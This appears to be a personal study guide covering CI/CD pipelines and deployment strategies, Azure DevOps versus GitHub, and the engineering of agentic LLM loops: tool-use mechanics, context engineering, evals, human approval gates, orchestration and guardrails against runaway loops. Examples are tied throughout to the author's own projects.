CI is the range check before you trust the rifle. Instead of zeroing once and hoping it holds all season, you confirm the group on every change — automatically. A drifted shot (a failing test) shows up immediately, while you still remember what you touched, instead of in the field when it counts.

A CI pipeline: a trigger spins up a fresh runner, which builds and tests the change, then reports a pass/fail status that gates the merge and emits a build artifact.

The terms, decoded

Pipeline / workflow. The sequence of automated steps, defined as code in a YAML file that lives in the repo. Versioned with everything else.
Trigger. What kicks it off — a push, a PR opening, a schedule, or a manual run.
Runner / agent. The machine that executes the steps. A clean, ephemeral environment each run, so "works on my machine" stops mattering. Hosted (the platform's) or self-hosted (yours).
Job / step / stage. Steps group into jobs; jobs can run in parallel and group into stages.
Artifact. The build output (a bundle, an image, a .whl) the pipeline produces and stores for later stages to deploy.
Status check. The pass/fail signal CI hands back to the PR — the gate from Module 23, now filled.

Same idea, two platforms

AZURE PIPELINES

GITHUB ACTIONS

Config file

azure-pipelines.yml

.github/workflows/*.yml

Worker

Agent (Microsoft-hosted or self-hosted)

Runner (GitHub-hosted or self-hosted)

Reusable unit

Task

Action (from the Marketplace)

↳ In your world

field_guide already has a .github/ workflow that builds and ships the single HTML file to Cloudflare Pages via Wrangler — that's CI/CD running on your own repo right now. At the day job, the Databricks equivalent is an Azure Pipeline that runs pytest and validates a Databricks Asset Bundle on every push before it's allowed near a workspace.

Module 25 · Ship It Safely Warm → Hot

Continuous Delivery & Deployment (CD)

The second half. CI proved the change is good; CD moves that proven artifact through environments and out to production — with the brakes that keep a bad release from becoming an outage.

The two D's people blur together: Continuous Delivery means every green build is always ready to release — going live is a button a human presses. Continuous Deployment goes one step further: if it's green, it ships to production automatically, no button. Same pipeline; the difference is whether a human stands at the prod gate.

◦ Field analogy

Rolling out a release is like easing a new feeder onto the property. You don't swap every site at once and hope. You put one out, watch the cams for a few days, and only when it's clearly working do you roll it to the rest. That's a canary deploy — and if the herd spooks, you pull it. Same instinct as a rollback.

One artifact promoted across environments. The gate before prod is what separates Continuous Delivery (human approves) from Continuous Deployment (no gate). Rollback re-deploys the last good build.

Deployment strategies — how the new version actually goes live

Dimension

BLUE-GREEN

CANARY

How

Two identical envs; flip all traffic from old (blue) to new (green) at once

Send a small % of traffic to the new version, widen as it proves out

Rollback

Instant — flip traffic back to blue

Stop widening, route the few back to old

Best when

You want a clean, instant cutover

You want to limit blast radius and watch real metrics first

The rest of the vocabulary

Environment / stage. A place the app runs — dev, test, staging, prod — each a checkpoint the same artifact is promoted through. You never rebuild per environment; you move the one build forward.
Approval gate. A required human (or policy) sign-off before promotion to a sensitive environment, usually prod.
Rollback. Re-deploying the last known-good artifact when a release goes wrong. Fast rollback > perfect releases.
Feature flag. A switch that ships code dark and turns it on later — decouples "deployed" from "released," so you can flip a feature off without a redeploy.

↳ In your world

This is exactly Vercel preview → production for Marked and base_camp: every PR gets a preview deploy (a throwaway environment), and promotion to prod is the gate. On the data side, promoting a Databricks Asset Bundle from a dev workspace to prod behind an Azure Pipelines approval is the same pattern. And the deploy-finished signal should land where everything else does — an ntfy push, your one notification layer.

Module 26 · Microsoft's Two Houses Hot

Azure DevOps vs. GitHub

Microsoft owns both — two complete DevOps suites that overlap almost entirely. Knowing which feature maps to which lets you move fluently between your enterprise day job and your own projects.

Everything in this group — repos, branches, PRs, pipelines, environments — exists in both Azure DevOps and GitHub, just under different names and menus. They're sibling products under one owner. Pick by context, not by capability: the concepts transfer one-to-one.

The same capability, row by row, under each platform's naming. Both speak Git, both define CI/CD as YAML in the repo — the dashed lines are one-to-one equivalents.

So which do you reach for?

If you…

AZURE DEVOPS

GITHUB

Context

Enterprise / regulated, already in Azure (Databricks, AD)

Open ecosystem, OSS, community, anything new

Strength

Mature Boards, granular pipeline controls, on-prem option

Huge Actions Marketplace, code-host gravity, Copilot

Microsoft's bet

Stable & supported, not where new investment goes

The strategic platform — new features land here first

◦ Why this matters

Microsoft is converging the two, not retiring either. GitHub is the go-forward platform getting the new investment; Azure DevOps stays fully supported for the enterprises standardized on it. They interoperate freely — an Azure Pipeline can build and deploy from a GitHub repo, and GitHub Actions can deploy straight into Azure. You're not locked into one house just because you started in it.

↳ In your world

You already live in both houses. The Tronox/Databricks day job is almost certainly Azure DevOps territory — Repos, Boards, and Pipelines wired to the Azure tenant. Your St. Range projects all sit on GitHub with Actions doing the shipping. The skill that pays off is reading a pipeline in either dialect and knowing it's the same five ideas from this group wearing different labels.

⌥ Hand to Claude Code

Take the GitHub Actions workflow that deploys field_guide and have me write the equivalent azure-pipelines.yml beside it — same steps, Azure dialect. Translating one real pipeline across both platforms is the fastest way to make the mapping in the diagram above stick.

Module 27 · The Map Synthesis

The CI/CD concept map

Every term in this group and how it wires to the next. Tap any node to light up its connections.

Read top-to-bottom and you get the path; this shows you the shape. The cool side is version control — a repo full of commits, branched and merged through pull requests. The hot side is automation — CI and CD, the two hubs everything turns on: CI proves a change, hands off an artifact, and CD promotes it to production. Both houses, Azure DevOps and GitHub, sit at the top because they host every node below them under different names.

tap a node

Cool nodes = version-control foundations (Modules 22–23) · Hot nodes = the automated pipeline (Modules 24–25) · White-hot = the platforms that host it all (Module 26).

Module 28 · The Evergreen Core Cold

The agentic loop

New section — the AI Practitioner arc. The foundational AI track covered what an agent, a context window, and an eval are; this section assumes that and teaches how to engineer the loop — control flow, context, evals, gates, budgets. It's a self-contained read, m28→m35, with its own cold→hot heat scale that resets to cold here. (Never built a loop at all? The foundational Agent Loop module — Module 10 — is the gentler first pass.)

Strip away the hype and an agent is one thing: an LLM autonomously using tools in a loop (Anthropic's working definition, popularized by Simon Willison). Everything in this track is the craft of engineering that loop — its control flow, the context you feed it, the evals that grade it, the humans who gate it, the budgets that bound it.

The shape is not new. It's the oldest idea in autonomous systems, wearing three names:

Sense → Plan → Act. The foundational robotics paradigm from the late-1960s Shakey robot at SRI: read the world, decide, do something, repeat. The literal ancestor of the agentic loop — and the literal shape of your Argus turret.
OODA. Col. John Boyd's Observe-Orient-Decide-Act — continuous decision under a changing environment. Bruce Schneier (Oct 2025) maps it onto agents but flags the catch: classical OODA assumed trusted inputs. Agents don't get that luxury: untrusted text an agent reads can be prompt injection — input that gets obeyed as if it were a command. (Deeper basics live in the foundational Prompt Injection module — Module 17.)
ReAct. The lineage hinge (Yao et al., arXiv 2210.03629, ICLR 2023): interleave Thought → Action → Observation. Grounding reasoning in a live tool (a Wikipedia API) cut hallucination versus pure chain-of-thought and beat baselines on ALFWorld (+34%) and WebShop (+10%).

One loop, three names. Sense·Plan·Act = OODA = ReAct — read the environment, decide, act on it, and the world you changed becomes your next input.

Chat completion vs. the loop

A chat completion is one request → one response. The agentic loop is act, observe, decide, repeat — dozens to hundreds of iterations. The defining difference is the goal-verification step inside the loop: the model checks its own progress against the goal each pass. That's what turns a text generator into, as practitioners put it, "a function you call."

◦ The discipline

A loop with no exit is a runaway (Module 35). Stopping conditions are load-bearing, not optional: a max-iteration cap, a token/cost budget, no-progress detection, and an explicit goal-achievement check. A loop you can't stop isn't autonomous — it's unbounded.

↳ In your world

Argus and OpenRange are the purest sense-plan-act loop you own. Sense the thermal feed from your AGM/RIX scopes over MQTT/FastAPI → detect motion → decide (threshold, classify) → act: fire an ntfy alert, or actuate the Waveshare pan-tilt turret. Boyd's warning lands hard here — the "observations" are a thermal scene that could be spoofed, so the actuation that matters gets a human gate (Module 33), never blind trust.

Module 29 · Control Flow Cool

Workflows vs. agents

The single most important design decision: who owns the control flow — your code, or the model? Most production systems should be workflows.

Anthropic's Building Effective Agents (Dec 2024) draws the line cleanly. A workflow orchestrates LLMs through predefined code paths — you own the control flow. An agent lets the model direct its own process — the model owns the control flow. The guidance: "find the simplest solution possible, and only increase complexity when needed."

The five workflow patterns (+ the agent as the sixth)

Prompt chaining. Fixed sequential steps; you trade latency for accuracy.
Routing. Classify the input, then dispatch to a specialized path.
Parallelization. Section independent subtasks, or vote N times and aggregate.
Orchestrator-workers. A lead LLM decomposes a task and delegates pieces (Module 34).
Evaluator-optimizer. One model generates, another critiques against criteria, in a loop (Module 33).
Autonomous agent. The model plans and acts on environmental feedback, pausing at checkpoints. The only one where the model owns control flow.

Self-correction has its own lineage feeding the later patterns: Self-Refine (Madaan 2023), CRITIC (tool-interactive critique), and Reflexion (Shinn et al., arXiv 2303.11366, NeurIPS 2023) — "verbal reinforcement learning" that stores a textual self-critique in episodic memory as a kind of semantic gradient, then retries (reported 91% pass@1 on HumanEval). Its failure mode is degeneration-of-thought: the model loops on the same flawed reasoning instead of escaping it.

Decide it: the escalation question

Barry Zhang (Anthropic) reduces the choice to a few questions. Is the task too ambiguous to pre-map as a decision tree? Valuable enough to justify the token spend (~10¢/task ≈ 30–50K tokens)? Is the cost of error tolerable, and can you verify the result? Coding is the canonical good fit — ambiguous, valuable, and verifiable via tests. Run your own task through it:

Is the task too ambiguous to pre-map as a fixed decision tree?

Is it valuable enough to justify ~30–50K tokens per run?

Can you verify the work — define and check "done"?

Is the cost of a wrong action tolerable (recoverable)?

Answer all four to get a read.

Dimension

WORKFLOW

AGENT

control flow

your code owns it

the model owns it

best when

path is pre-mappable

path can't be pre-mapped, but progress is verifiable

cost / latency

predictable, bounded

variable, ~4×+ the tokens of chat

default choice

yes — start here

only when flexibility earns its keep

Module 30 · Pattern A — the spine Warm

The tool-use loop, for real

The single most important runnable pattern: the Anthropic Messages API tool-use loop, with the real field names and the gotchas that cause 400s.

Here is the loop as actual API mechanics, not metaphor. You POST a message list plus a tools array. Claude replies with a content block list that may contain tool_use blocks (each with an id, name, and input). You run each tool, package the outputs as tool_result blocks, and send them back. Repeat until Claude stops asking for tools.

Pattern A. Loop while Claude keeps emitting tool_use blocks; append its reply verbatim, answer with matching tool_result blocks in one user message, resend with the same tools[].

The three gotchas that bite everyone

Exit on the absence of tool_use blocks — not on stop_reason. The robust loop condition is "did the content contain any tool_use blocks?" A reply can have stop_reason: "max_tokens" while a tool call is still sitting in the content. Key off the blocks, not the reason. Once there are no tool_use blocks the loop ends; then you inspect and handle the stop_reason (end_turn, max_tokens, stop_sequence, refusal) — it tells you why Claude stopped, it is not what triggers the exit.
Append the assistant's content verbatim, then the matching results. Push Claude's full content (text + tool_use) back as one assistant message, then a user message whose tool_result blocks each carry a tool_use_id that matches a tool_use.id. Mismatch or omission → the API returns 400.
All parallel tool results go in a single user message. If Claude requests three tools at once, you run all three and return all three tool_result blocks together in one message — not three messages. And always bound the whole thing with a max-iteration counter.

Under the hood · server tools and pause_turn

Server-side tools (web_search, code_execution) run on Anthropic's side, so the loop looks slightly different: a long-running call can come back with stop_reason: "pause_turn". That isn't an error or a completion — it's "I'm not done thinking." You simply resend the conversation as-is to let it continue. Same discipline applies: bound it, and don't treat the stop_reason as your exit signal.

↳ In your world

Marked is a Pattern A loop over Supabase. The "Marked Intelligence" chatbot is the looping agent: its tools query and write Supabase — log a catch, fetch conditions, pull journal entries. The Haiku fishing-forecast is the counterexample: a single augmented call, not a loop. Haiku is exactly right for that straightforward, high-volume, one-shot forecast — don't spend a loop where one call does the job.

Module 31 · Long Horizons Warm → Hot

Long-running agents & error compounding

Why the agent that nails a 5-minute task falls apart over four hours — and the math that explains it.

The frontier of 2025–2026 is duration. OpenAI Codex runs tasks ~30 minutes in isolated cloud sandboxes; Devin manages multi-day projects via parent-child session hierarchies. And the trend is steep: METR (Kwa et al., arXiv 2503.14499, Mar 2025) measured the task-completion time horizon doubling roughly every 7 months for six years — Claude 3.7 Sonnet sat at about a 50-minute "50% time horizon" then.

But length is brutal because failure compounds. Toby Ord's constant-hazard model (arXiv 2505.05115, May 2025) is the clean first approximation: "if you double the task duration, you square the success probability" — 50% at one hour becomes 25% at two, 6% at four. Treat it as a useful early model, not the settled story: a Feb 4 2026 update argues hazard rates likely decline over a run (an agent that survives the first hour is steadier in the second), so real curves fall off more gently than pure squaring. Either way the direction holds — each step still multiplies the weakest link's failure rate, and that compounding is why long loops drift toward failure.

Constant hazard rate: double the horizon, square the success rate. A reliable 1-hour agent is an unreliable 4-hour one — capability rises, but compounding wins over distance.

The three failure modes that kill long runs

Context overflow. The window fills, the agent loses its working state (the fix is Module 32).
Context / goal drift. It still sees its recent actions but loses the original intent. ("Agent Drift," arXiv 2601.04170, reports up to a 42% reduction in success.) A 2026 "Control-Theoretic Foundation for Agentic Systems" likens a non-converging retry loop to integral windup from PID control — the agent keeps over-correcting and never settles.
Token-cost explosion. Every wasted iteration is paid for (Module 35).

◦ The discipline

Anthropic's "effective harnesses for long-running agents" answer is a different prompt for the very first context window: an initializer agent sets up the environment, and a claude-progress.txt plus git history lets a fresh context window pick up exactly where the last one died. The loop is designed to survive its own memory loss — which is the whole game past the one-hour mark.

Module 32 · The Scarce Resource Hot

Context engineering

Prompt engineering grew up. The job now is curating the smallest set of high-signal tokens a loop runs on — because more context makes models worse, not better.

Anthropic's Effective context engineering for AI agents (Sep 29 2025) frames it as "the natural progression of prompt engineering" — "strategies for curating and maintaining the optimal set of tokens during LLM inference." The guiding principle: find the smallest set of high-signal tokens that maximize the likelihood of your desired outcome. Context is finite — an "attention budget" rooted in the transformer's n² attention.

And it's not just a capacity limit. Context rot (Chroma Research, 2025) evaluated 18 models — GPT-4.1, Claude 4, Gemini 2.5, Qwen3 — and found "performance grows increasingly unreliable as input length grows," with degradation even on a trivial repeated-words copy task, well before the window is full. The metric that matters is signal-to-noise, not how many tokens fit.

Context rot: reliability decays as input grows, and the knee comes well before the window fills. You're managing signal-to-noise, not capacity.

The four techniques

Compaction. Summarize a near-full context and reinitialize a fresh window. Claude Code preserves architectural decisions, unresolved bugs, implementation details, and the 5 most-recent files. The lightest version is just clearing old tool results.
Structured note-taking / agentic memory. Persist a NOTES.md or to-do list outside the context and re-read it. (Claude playing Pokémon kept tallies across thousands of steps this way.)
Sub-agent context isolation. Specialized subagents explore with their own clean windows and return a condensed 1–2K-token summary — the real lever behind multi-agent (Module 34).
Just-in-time retrieval. Keep lightweight identifiers (file paths, queries) in context and load the data at runtime. Claude Code's glob/grep + a lean CLAUDE.md is exactly this hybrid.

This is also where memory lives. Short-term memory is the context window itself (thread-scoped, volatile); long-term memory is a durable external store — split by function into episodic (events), semantic (facts), and procedural (how-to), and by representation into vector stores, knowledge graphs, and file stores. Anthropic's file-based memory tool (Sonnet 4.5) pairs context editing with durable memory outside the window; for a small single-user fleet, long-context can often undercut a dedicated vector stack. (RAG and the full memory taxonomy get their gentler first pass in the foundational Context, RAG & Memory module — Module 12; the practitioner's question here is narrower: what earns a place in the window.)

↳ In your world

Your lean CLAUDE.md per project is just-in-time retrieval done right — a small high-signal map plus glob/grep, instead of pasting whole repos into context. And the agent-env effort itself is a context-engineering play: a static shared "operating brain" each harness reads, with per-agent memory kept separate so the windows stay clean and conflict-free.

Module 33 · Closing the Loop Hot

Feedback, evals & human gates

A loop is only as good as the feedback that closes it — machine-graded where you can verify, human-gated where you can't afford to be wrong.

There are two loops, and confusing them is a classic mistake. The inner loop is the agent self-correcting within a task — it reads a tool error or a failing test and fixes itself. The outer loop is you, the developer, iterating on the agent across tasks using evals and observability. Evals — not model capability — are usually the real bottleneck. (New to evaluating non-deterministic output? The foundational Evals module — Module 16 — is the gentler first pass on why you measure; here we wire evals into the loop itself.)

Machine feedback: evals & self-correction

Reflection (Pattern B). Generate → self-critique ("what's missing, what's superfluous") → revise, to a quality bar or a max iteration. Bind the critique to a schema (answer + reflection in one structured call) so it stays disciplined.
Evaluator-optimizer (Pattern C). A generator produces; an evaluator scores against explicit criteria and returns pass/fail + feedback; loop until pass or budget. Best when criteria are clear and refinement helps (translation, multi-round search).
LLM-as-judge. Score another model's output against criteria (groundedness, correctness, relevance), constrained to structured JSON. Sample 1–5% of production traces online, and feed production failures back as offline test cases. Tooling: LangSmith, MLflow 3.0 (built-in judges + prompt optimizers like GEPA/MIPRO), Braintrust, Phoenix. Without evals, you ship on vibes.

Human feedback: the gate (Pattern D)

Autonomy is a spectrum, not a switch. The rule: automate everything reversible; insert a human at the irreversible, high-blast-radius, or regulated steps. The canonical implementation is LangGraph's interrupt() + a checkpointer — pause mid-graph, surface an approve / edit / reject payload, resume with Command(resume=…). A checkpointer is required. Good practice: don't interrupt reversible steps (rubber-stamp training defeats the point), use confidence/amount thresholds (auto-approve < $500, route > $5,000 to a human), and design for the thread that never resumes.

◦ Field analogy

The human gate is the require-review gate before production from the CI/CD track (Module 25) — the same idea, pointed at an agent. Reversible steps flow through automatically; the one consequential action waits for a yes.

↳ In your world

Two places this lands. The Argus turret is the textbook gate — sensing and ntfy alerts run free, but any actuation that matters waits for a human "yes," because the observation could be spoofed and the action is physical. And Marked's forecast quality is an evaluator-optimizer problem: keep a small golden set of days you know, and grade the Haiku forecast against them so you're improving on evidence, not vibes.

Module 34 · Many Loops White-hot

Orchestration & meta-harnesses

When one loop becomes many — orchestrator and workers, the unresolved multi-agent debate, and the meta-harness that governs whole fleets.

The orchestrator-worker pattern (Pattern E) puts a lead agent in charge: it saves a plan to memory, spawns subagents with self-contained task descriptions and explicit boundaries ("don't research X, that's another subagent's job"), each with a clean context window, then synthesizes their condensed results. Anthropic's multi-agent research system (Jun 2025) reports a lead Opus 4 with Sonnet 4 subagents outperforming single-agent Opus 4 by 90.2% on an internal research eval — but token usage alone explained 80% of that variance, and multi-agent burns ~15× the tokens of chat. (Why split work across agents at all? The foundational Multi-Agent Systems module — Module 14 — is the gentler first pass; here we engineer the orchestration.)

Orchestrator-workers: a lead fans work out to isolated subagents and merges their summaries. The safe reconciliation — parallelize reads, keep writes single-threaded.

The debate (unresolved)

Anthropic says "do multi-agent, carefully." Cognition's Don't Build Multi-Agents (Jun 2025) says don't — parallel agents make conflicting implicit decisions (their Flappy Bird example), and context engineering with single-threaded control is more reliable; their 2026 follow-up concedes a narrower class works. The safe synthesis (LangChain / Phil Schmid) is a read-vs-write split: parallelize independent reads and research, keep writes single-threaded. The hard limit both sides agree on: domains where every agent needs shared context, or with many dependencies, are not a fit.

The meta-harness layer

Above individual harnesses sits a new layer. Databricks Omnigent (open-sourced Jun 2026, Apache 2.0, alpha v0.1.1) is a meta-harness: a runner wraps any agent — Claude Code, Codex, Cursor, Pi — in a sandboxed session with a uniform API. Three pillars: Composition (swap/combine harnesses via one-line YAML), Control (stateful policies enforced at the meta-harness layer, not via prompts — e.g. a cost budget that pauses at $3.00 and hard-caps at $5.00), and Collaboration (sessions follow you across devices). Its bundled Polly is a multi-agent coding orchestrator delegating to parallel git-worktree subagents, cross-reviewed by a different vendor.

Under the hood · the governed Databricks agent stack

The Mosaic AI Agent Framework connects Delta Lake data to LLMs via Vector Search, Model Serving, and MLflow tracing. The recommended authoring interface is the MLflow ResponsesAgent (subclass it, implement predict/predict_stream) — it supersedes the older ChatAgent/ChatModel, and its canonical tool-calling loop lives in call_and_run_tools with a max_iter=10 bound. Methods are traced with @mlflow.trace, logged via Models-from-Code, registered to Unity Catalog (three-level catalog.schema.model), and deployed — newer guidance prefers Databricks Apps over the older agents.deploy → Model Serving path. Governance stacks in three layers: UC permissions → Service Policies → Unity AI Gateway guardrails (PII redaction, prompt-injection detection, hallucination guard).

↳ In your world

Omnigent / Polly is your orchestrator-worker frontier — and your whole agent-env effort is a meta-harness play: shared static context, per-agent memory, work pushed onto Codex on a separate quota. The control pillar maps straight to your needs: cost budgets and contextual policies enforced at the layer above the agent, traced in MLflow — exactly the "brakes in code, not prompts" rule you'll meet again in Module 35.

Module 35 · Synthesis Synthesis

Pitfalls & the escalation ladder

Where loops go wrong, the non-negotiable guardrails, and the one rule that ties the whole track together: add agency only when it earns its keep.

Runaway loops are documented and expensive. A widely-cited GitHub incident (OpenCode issue #2571) describes a Gemini 3.1 Pro subagent with no max-step limit stuck in a git-diff / read verification loop — 809 consecutive turns over 3.5 hours, burning roughly $350 (the cost display showed under half the true bill, missing a >200K-token pricing tier). It's a third-party report, so treat the dollar figure as approximate — but the failure mode is real, and it's the default outcome of an unbounded loop.

The non-negotiable guardrails

Hard max-iteration cap. Start at 5–10, raise to 15–30 as success justifies it.
Token / cost budget per run. A hard cap plus a soft warning (the Omnigent pause-at-$3, stop-at-$5 shape).
No-progress / loop detection. A hash-match on actions catches 90%+ of real loops — exit on repeated identical actions.
Timeouts at both the task and the individual API-call level.
A well-scoped success condition. Write what "done" looks like before launching — "all tests in /tests/unit/ pass with exit code 0," not "fix the bugs." If you can't, the task isn't ready for autonomy.

Where determinism matters, use it: put guardrails in code and hooks, not prompts — "everything else is a polite suggestion." Tools are "a contract between deterministic systems and non-deterministic agents." The other failure modes to instrument against: error compounding (Module 31), context exhaustion/rot (Module 32), goal drift, and hallucinated tool calls (return minimal structured outputs, surface errors clearly).

The responsible escalation path

The whole track, in one cold→hot ladder. Climb a rung only when the rung below genuinely can't do the job — agency you don't need is latency, cost, and error-compounding you didn't have to pay for.

The escalation ladder. Start at rung 1; climb only when flexibility outweighs latency, cost, and error-compounding — and instrument every rung with evals + tracing before going higher.

◦ The one habit that matters most

Before you launch any loop, write its success condition and its budget in plain text. If you can't state "done" in a way a script could check, you're not ready to hand it to an agent — you're ready to keep a human in the loop. That single sentence prevents most of the failures in this whole track.

⌥ Hand to Claude Code

Make the brakes real in your stack: wrap an OpenRange/Argus decision loop in a tiny harness with a hard max_iterations, a per-run token budget, and an action-hash check that exits on repeats — and route any turret actuation through a human-gated confirm before it fires. Start with the success condition written as a checkable string, then build outward. It turns Module 35 from reading into muscle memory.

A thermal reading ofartificial intelligence

What an AI actually is

Three things it is not

Tokens & meaning-as-geometry

Transformers & attention

Stacked into layers

How it learns

What "learning" leaves behind

Inference, sampling & the context window

The context window — the one limit that explains everything

Thinking before answering

Trained to reason vs. just told to

The control dial: reasoning effort

The model vs. the thing you talk to

Harnesses

The pieces

Chat vs. agents

It's a spectrum, not a switch

The agent loop

Why looping is the superpower

Tools, function calling & MCP

MCP — the standard that makes this plug-and-play

Context engineering, RAG & memory

RAG — Retrieval-Augmented Generation

Memory — persistence across the gaps

Fine-tuning vs. RAG

Which lever, when

Failure modes — credibility lives here

Multi-agent orchestration

Common patterns

Orchestration & shared context

The topologies — pick the shape that matches the work

Shared context — the genuinely hard part

Across harnesses, and why opacity is correct

Provenance & trust on merge

Coordination failure modes — where it bites

Practical levers — what keeps it alive

Evals — knowing it works

Why normal tests stop working

Build the set from real failures, not imagination

The grader ladder — cheap to expensive

Offline, online, and the CI gate

Agents and RAG get graded differently

Prompt injection & agent security

Direct vs. indirect injection

The lethal trifecta

Realistic defenses — defense-in-depth, not a fix

Using AI the right way

1 · Pick the right altitude for the task

2 · Prompt like you're briefing a sharp contractor

3 · Verify — always, especially when it sounds confident

4 · Manage the context window like a campsite

5 · Know what good looks like (evals)

6 · Let your role shift up the stack

Choosing your tools — models & harnesses

The models — the engines

Anthropic's surfaces — your home turf

Cowork vs. Claude Code — same engine, different vehicle

Coding & agent harnesses beyond Anthropic

Omnigent — the meta-harness

Picking in practice

The knowledge graph

Your beginner → advanced roadmap

Get the intuition cold

Become a power user of chat

Build your first harness

Close the loop — your first agent

Ground it in your own data

Orchestrate — but only when earned

The SDLC & Git basics

The vocabulary you'll actually use

Branching, merging & pull requests

Merge vs. rebase — the one nuance that trips people up

The rest of the key terms

Branching strategies

Continuous Integration (CI)

The terms, decoded

Continuous Delivery & Deployment (CD)

Deployment strategies — how the new version actually goes live

The rest of the vocabulary

A thermal reading of
artificial intelligence